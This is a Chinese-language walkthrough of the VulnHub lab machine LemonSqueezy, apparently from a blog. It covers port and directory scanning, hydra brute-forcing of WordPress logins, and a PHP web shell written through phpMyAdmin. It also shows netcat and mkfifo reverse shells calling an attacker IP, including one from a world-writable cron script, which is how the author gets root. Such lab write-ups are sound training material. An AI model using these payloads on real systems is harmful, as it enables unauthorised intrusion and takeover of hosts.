vulnhub(15):lemonsqueezy(hydra爆破、计划任务提权)

端口

复制代码
nmap -Pn -p- 192.168.72.173
​
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:B8:2D:FC (VMware)

打点

80端口

主页面是apache2的默认页面,没有robots.txt,我们直接扫描目录

复制代码
gobuster dir -u http://192.168.72.173/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 
​
/manual/              (Status: 200) [Size: 626]
/wordpress/           (Status: 200) [Size: 52276]
/javascript/          (Status: 403) [Size: 279]
/phpmyadmin/          (Status: 200) [Size: 10531]

发现wordpress之后,查看wordpress主页

主页翻了翻,没有什么敏感信息,尝试hydra爆破

hydra爆破

burp抓包保存请求头到raj文件中,raj文件如下

复制代码
Host: lemonsqueezy
User-Agent: Mozilla/5.0 (Hydra Proxy)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lemonsqueezy/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://lemonsqueezy
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

写python脚本,将数据包中的信息转成hydra命令

python 复制代码
file_array = []
​
file = input(str())
​
with open(file,"r") as f:
    for line in f:
        file_array.append(":H=" + line.strip().replace(":","\\:"))
​
header=""
​
for line in file_array:
    header += line
    print(line)
print(header)

结果

复制代码
:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1

hydra爆破用户名

复制代码
hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -p 123 lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate
:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109
:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:Invalid"
​
结果爆破出两个用户,保存到usernames.txt文件:
lemon
orange

hydra爆破密码

复制代码
hydra -L usernames.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate
:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109
:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:incorrect"
​
爆破出密码:
[80][http-post-form] host: lemonsqueezy   login: orange   password: ginger
登陆后台

看到一个敏感信息,在以Keep this safe!为标题的post下的内容如下

复制代码
n0t1n@w0rdl1st!
登录phpmyadmin
复制代码
orange
n0t1n@w0rdl1st!
sql语句上传木马
复制代码
select "<?php system($_GET['a'])?>" into outfile "/var/www/html/wordpress/1.php"
反弹shell
复制代码
http://lemonsqueezy/wordpress/1.php?a=nc 192.168.72.162 1234 -e /bin/bash

提权

crontab
复制代码
运行了如下脚本
*/2 *   * * *   root    /etc/logrotate.d/logrotate
​
此外这个脚本是777权限
反弹shell覆盖此文件
复制代码
echo "mkfifo /tmp/f; nc 192.168.72.162 223 </tmp/f | bash > /tmp/f 2>&1;rm -rf /tmp/f" > /etc/logrotate.d/logrotate
​
攻击主机监听:
nc -nvlp 223
root
复制代码
[listening on [any] 223 ...
connect to [192.168.72.162] from (UNKNOWN) [192.168.72.173] 59534
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls
root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=]()
相关推荐
白总Server3 分钟前
物联网网关确保设备安全
服务器·网络·物联网·安全·web安全·自然语言处理·架构
掌控安全EDU4 分钟前
安全研究 | 不同编程语言中 IP 地址分类的不一致性
网络协议·tcp/ip·安全·xss
2101_824775825 分钟前
Linux(centOS)的安全命令
linux·安全·centos
旗晟机器人6 分钟前
A4-C四驱高防变电站巡检机器人
大数据·人工智能·安全·机器人
龙哥说跨境9 分钟前
如何使用AdsPower指纹浏览器克服爬虫技术限制,安全高效进行爬虫!
爬虫·安全
weixi_kelaile52010 分钟前
ai智能语音电销机器人可以做哪些事情?
java·linux·服务器·人工智能·机器人·云计算·腾讯云
hummhumm14 分钟前
Oracle 第13章:事务处理
开发语言·数据库·后端·python·sql·oracle·database
童先生18 分钟前
python 用于请求chartGpt DEMO request请求方式
开发语言·python
朝九晚五ฺ18 分钟前
【Linux探索学习】第九弹——Linux工具篇(四):项目自动化构建工具—make/Makefile
linux·运维·学习·ubuntu·自动化
lida20032 小时前
无人机救援系统简单解读
linux·无人机·openipc·wfb-ng